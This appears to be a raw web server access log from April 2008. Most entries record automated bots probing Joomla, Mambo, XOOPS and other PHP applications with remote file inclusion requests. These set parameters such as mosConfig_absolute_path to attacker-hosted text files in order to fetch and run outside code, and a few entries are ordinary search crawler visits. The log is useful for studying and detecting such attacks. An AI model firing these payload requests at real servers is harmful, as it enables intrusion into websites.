74.53.197.2 - - [20/Apr/2008:18:42:45 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
74.53.197.2 - - [20/Apr/2008:18:42:45 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.79"
64.22.89.194 - - [20/Apr/2008:18:43:00 -0600] "GET /logs/access_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 297 "-" "libwww-perl/5.808"
74.53.197.2 - - [20/Apr/2008:18:43:38 -0600] "GET /logs/access_log.20080330//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 297 "-" "libwww-perl/5.79"
202.190.76.246 - - [20/Apr/2008:18:44:34 -0600] "GET /logs/access_log.20080330//configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
122.201.82.63 - - [20/Apr/2008:18:54:04 -0600] "GET /logs/access_log.20080330//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
122.201.82.63 - - [20/Apr/2008:18:54:10 -0600] "GET //xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
122.201.82.63 - - [20/Apr/2008:18:54:15 -0600] "GET /logs//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.79"
72.30.226.190 - - [20/Apr/2008:19:04:06 -0600] "GET /logs/error_log HTTP/1.0" 200 18861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
216.146.28.254 - - [20/Apr/2008:19:04:14 -0600] "GET //?headfoot=yes&path[docroot]=http://multiplan.pl/modules/test.txt??? HTTP/1.1" 200 698 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
216.146.28.254 - - [20/Apr/2008:19:04:16 -0600] "GET /logs//?headfoot=yes&path[docroot]=http://multiplan.pl/modules/test.txt??? HTTP/1.1" 200 1740 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
66.232.156.130 - - [20/Apr/2008:19:05:09 -0600] "GET /logs/access_log//error.php?dir=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.810"
66.232.156.130 - - [20/Apr/2008:19:05:09 -0600] "GET //error.php?dir=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.810"
66.232.156.130 - - [20/Apr/2008:19:05:09 -0600] "GET /logs//error.php?dir=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
66.232.156.130 - - [20/Apr/2008:19:05:37 -0600] "GET /logs/access_log.20080224//error.php?dir=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.810"
62.117.106.4 - - [20/Apr/2008:19:06:14 -0600] "GET /logs/access_log//?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
62.117.106.4 - - [20/Apr/2008:19:06:14 -0600] "GET //?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 200 698 "-" "libwww-perl/5.805"
62.117.106.4 - - [20/Apr/2008:19:06:15 -0600] "GET /logs//?mosConfig_absolute_path=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 200 1740 "-" "libwww-perl/5.805"
80.71.36.82 - - [20/Apr/2008:19:08:53 -0600] "GET /logs/access_log//index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
80.71.36.82 - - [20/Apr/2008:19:08:54 -0600] "GET //index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
80.71.36.82 - - [20/Apr/2008:19:08:54 -0600] "GET /logs//index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
64.119.182.47 - - [20/Apr/2008:19:09:37 -0600] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 274 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
64.119.182.47 - - [20/Apr/2008:19:09:37 -0600] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.imageforum.ru//language/lang_english/languages/test.txt??? HTTP/1.1" 404 269 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
80.71.36.82 - - [20/Apr/2008:19:10:30 -0600] "GET /logs//index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
80.71.36.82 - - [20/Apr/2008:19:10:30 -0600] "GET //index1.php?x=http://begundal.info/nothing/id2.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.805"
209.200.245.189 - - [20/Apr/2008:19:12:15 -0600] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
209.200.245.189 - - [20/Apr/2008:19:12:15 -0600] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
122.201.82.63 - - [20/Apr/2008:19:17:55 -0600] "GET /logs/error_log.20080330//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.79"
66.45.231.226 - - [20/Apr/2008:19:18:31 -0600] "GET /logs/access_log.20080224/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 280 "-" "libwww-perl/5.810"
66.45.231.226 - - [20/Apr/2008:19:18:31 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 255 "-" "libwww-perl/5.810"
66.45.231.226 - - [20/Apr/2008:19:18:31 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 260 "-" "libwww-perl/5.810"
122.201.82.63 - - [20/Apr/2008:19:24:57 -0600] "GET /logs/access_log.20080330/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.79"
122.201.82.63 - - [20/Apr/2008:19:25:03 -0600] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
122.201.82.63 - - [20/Apr/2008:19:25:08 -0600] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.79"
66.45.231.226 - - [20/Apr/2008:19:33:34 -0600] "GET /logs/error_log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.iammypersonalbest.com/oneadmin/linksdir/id2.txt? HTTP/1.1" 404 270 "-" "libwww-perl/5.810"
194.85.94.120 - - [20/Apr/2008:19:52:37 -0600] "GET /logs/access_log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
194.85.94.120 - - [20/Apr/2008:19:52:38 -0600] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
194.85.94.120 - - [20/Apr/2008:19:52:38 -0600] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
212.92.23.94 - - [20/Apr/2008:19:52:40 -0600] "GET /logs/access_log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
212.92.23.94 - - [20/Apr/2008:19:52:40 -0600] "GET /logs/access_log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
212.92.23.94 - - [20/Apr/2008:19:52:40 -0600] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
212.92.23.94 - - [20/Apr/2008:19:52:41 -0600] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
212.92.23.94 - - [20/Apr/2008:19:52:41 -0600] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
212.92.23.94 - - [20/Apr/2008:19:52:41 -0600] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
72.232.122.239 - - [20/Apr/2008:19:54:10 -0600] "GET /logs/access_log//skin/zero_vote/ask_password.php?dir=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
72.232.122.239 - - [20/Apr/2008:19:54:11 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.811"
72.232.122.239 - - [20/Apr/2008:19:54:11 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://suwarjono.net/scan/id2.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
194.85.94.120 - - [20/Apr/2008:19:54:19 -0600] "GET /logs/access_log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
194.85.94.120 - - [20/Apr/2008:19:54:20 -0600] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
194.85.94.120 - - [20/Apr/2008:19:54:20 -0600] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
195.19.33.141 - - [20/Apr/2008:19:55:25 -0600] "GET /logs/access_log//skin/zero_vote/ask_password.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
195.19.33.141 - - [20/Apr/2008:19:55:25 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
195.19.33.141 - - [20/Apr/2008:19:55:25 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
72.30.216.92 - - [20/Apr/2008:19:55:43 -0600] "GET /logs/access_log.20080127 HTTP/1.0" 404 218 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.117.106.4 - - [20/Apr/2008:19:56:17 -0600] "GET /logs/access_log/index2.php?page=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
62.117.106.4 - - [20/Apr/2008:19:56:18 -0600] "GET /index2.php?page=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
62.117.106.4 - - [20/Apr/2008:19:56:18 -0600] "GET /logs/index2.php?page=http://www.stiri-mondene.com//id.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
209.200.245.189 - - [20/Apr/2008:19:56:42 -0600] "GET /convert/mvcw.php?vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
209.200.245.189 - - [20/Apr/2008:19:56:42 -0600] "GET /logs/convert/mvcw.php?vwar_root=http://www.math-center.gr/components/com_facileforms/.log/rox.txt???? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
67.195.52.109 - - [20/Apr/2008:19:57:42 -0600] "GET /?M=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.242 - - [20/Apr/2008:19:58:56 -0600] "GET /?N=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.242 - - [20/Apr/2008:19:59:06 -0600] "GET /?M=D HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.37 - - [20/Apr/2008:20:00:41 -0600] "GET /?D=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.149.160.250 - - [20/Apr/2008:20:00:49 -0600] "GET /logs/access_log/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 232 "-" "libwww-perl/5.803"
83.149.160.250 - - [20/Apr/2008:20:00:50 -0600] "GET /index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
83.149.160.250 - - [20/Apr/2008:20:00:50 -0600] "GET /logs/index2.php?page=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
122.201.82.63 - - [20/Apr/2008:20:04:28 -0600] "GET /logs/error_log.20080330//components/com_facileforms/facileforms.frame.php?ff_compath=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 279 "-" "libwww-perl/5.79"
67.195.51.220 - - [20/Apr/2008:20:06:22 -0600] "GET /?N=D HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.56 - - [20/Apr/2008:20:07:23 -0600] "GET /?S=A HTTP/1.0" 200 686 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [20/Apr/2008:20:09:25 -0600] "GET /urchin/ HTTP/1.0" 200 814 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [20/Apr/2008:20:09:35 -0600] "GET /urchin/index.cgi?urc HTTP/1.0" 200 237 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [20/Apr/2008:20:09:45 -0600] "GET /urchin/index.cgi?top HTTP/1.0" 200 636 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.51.105 - - [20/Apr/2008:20:09:55 -0600] "GET /urchin/index.cgi?1101 HTTP/1.0" 200 27341 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
62.84.188.7 - - [20/Apr/2008:20:18:32 -0600] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
122.201.82.63 - - [20/Apr/2008:20:19:06 -0600] "GET /logs/error_log.20080330//configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.79"
122.201.82.63 - - [20/Apr/2008:20:19:11 -0600] "GET //configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
122.201.82.63 - - [20/Apr/2008:20:19:17 -0600] "GET /logs//configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.79"
200.68.95.209 - - [20/Apr/2008:20:20:21 -0600] "GET /logs/error_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.63"
200.68.95.209 - - [20/Apr/2008:20:20:22 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.63"
200.68.95.209 - - [20/Apr/2008:20:20:23 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.63"
200.68.95.209 - - [20/Apr/2008:20:22:24 -0600] "GET /logs/error_log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 281 "-" "libwww-perl/5.63"
200.68.95.209 - - [20/Apr/2008:20:24:33 -0600] "GET /logs/access_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.63"
200.68.95.209 - - [20/Apr/2008:20:25:53 -0600] "GET /logs/access_log.20080224/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.63"
200.68.95.209 - - [20/Apr/2008:20:25:53 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.63"
200.68.95.209 - - [20/Apr/2008:20:25:53 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.63"
212.67.202.9 - - [20/Apr/2008:20:26:09 -0600] "GET /logs/error_log.20080330//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 290 "-" "libwww-perl/5.68"
212.67.202.9 - - [20/Apr/2008:20:26:09 -0600] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.68"
212.67.202.9 - - [20/Apr/2008:20:26:09 -0600] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.68"
198.65.21.204 - - [20/Apr/2008:20:28:06 -0600] "GET /logs/access_log//skin/zero_vote/ask_password.php?dir=http://www.systel.ru/phpbb2//language/lang_german/print.txt? HTTP/1.0" 404 242 "-" "libwww-perl/5.53"
198.65.21.204 - - [20/Apr/2008:20:28:06 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.systel.ru/phpbb2//language/lang_german/print.txt? HTTP/1.0" 404 226 "-" "libwww-perl/5.53"
198.65.21.204 - - [20/Apr/2008:20:28:06 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.systel.ru/phpbb2//language/lang_german/print.txt? HTTP/1.0" 404 231 "-" "libwww-perl/5.53"
96.52.36.19 - - [20/Apr/2008:20:28:31 -0600] "GET /logs/access_log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 231 "-" "libwww-perl/5.79"
96.52.36.19 - - [20/Apr/2008:20:28:31 -0600] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
96.52.36.19 - - [20/Apr/2008:20:28:31 -0600] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://it.geocities.com/bigli0np0wa/blpid.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
122.201.82.63 - - [20/Apr/2008:20:29:07 -0600] "GET /logs/access_log.20080330//configuration.php?mosConfig_live_site=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
212.67.202.9 - - [20/Apr/2008:20:29:24 -0600] "GET /logs/access_log.20080224/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 280 "-" "libwww-perl/5.68"
212.67.202.9 - - [20/Apr/2008:20:29:24 -0600] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 255 "-" "libwww-perl/5.68"
212.67.202.9 - - [20/Apr/2008:20:29:24 -0600] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://bowpoint.bow.it/id2.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.68"
72.29.70.163 - - [20/Apr/2008:20:29:37 -0600] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://betterplaybilliards.org//images/rotest.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
72.29.70.163 - - [20/Apr/2008:20:29:37 -0600] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://betterplaybilliards.org//images/rotest.txt? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
74.6.22.180 - - [20/Apr/2008:20:33:20 -0600] "GET /robots.txt HTTP/1.0" 404 204 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.9.155 - - [20/Apr/2008:20:33:21 -0600] "GET /logs/?D=A HTTP/1.0" 200 1723 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
78.90.30.31 - - [20/Apr/2008:20:34:02 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:02 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:02 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:03 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:03 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:03 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:05 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:06 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:06 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:06 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:07 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
78.90.30.31 - - [20/Apr/2008:20:34:07 -0600] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.803"
207.142.16.5 - - [20/Apr/2008:20:34:09 -0600] "GET /logs/access_log//skin/zero_vote/ask_password.php?dir=http://g0tcha.fileave.com/id.txt? HTTP/1.0" 404 242 "-" "libwww-perl/5.53"
78.90.30.31 - - [20/Apr/2008:20:34:09 -0600] "GET /logs/error_log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 265 "-" "libwww-perl/5.803"
207.142.16.5 - - [20/Apr/2008:20:34:09 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://g0tcha.fileave.com/id.txt? HTTP/1.0" 404 226 "-" "libwww-perl/5.53"
207.142.16.5 - - [20/Apr/2008:20:34:09 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://g0tcha.fileave.com/id.txt? HTTP/1.0" 404 231 "-" "libwww-perl/5.53"
78.90.30.31 - - [20/Apr/2008:20:34:10 -0600] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.rentacarspain.net//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.803"
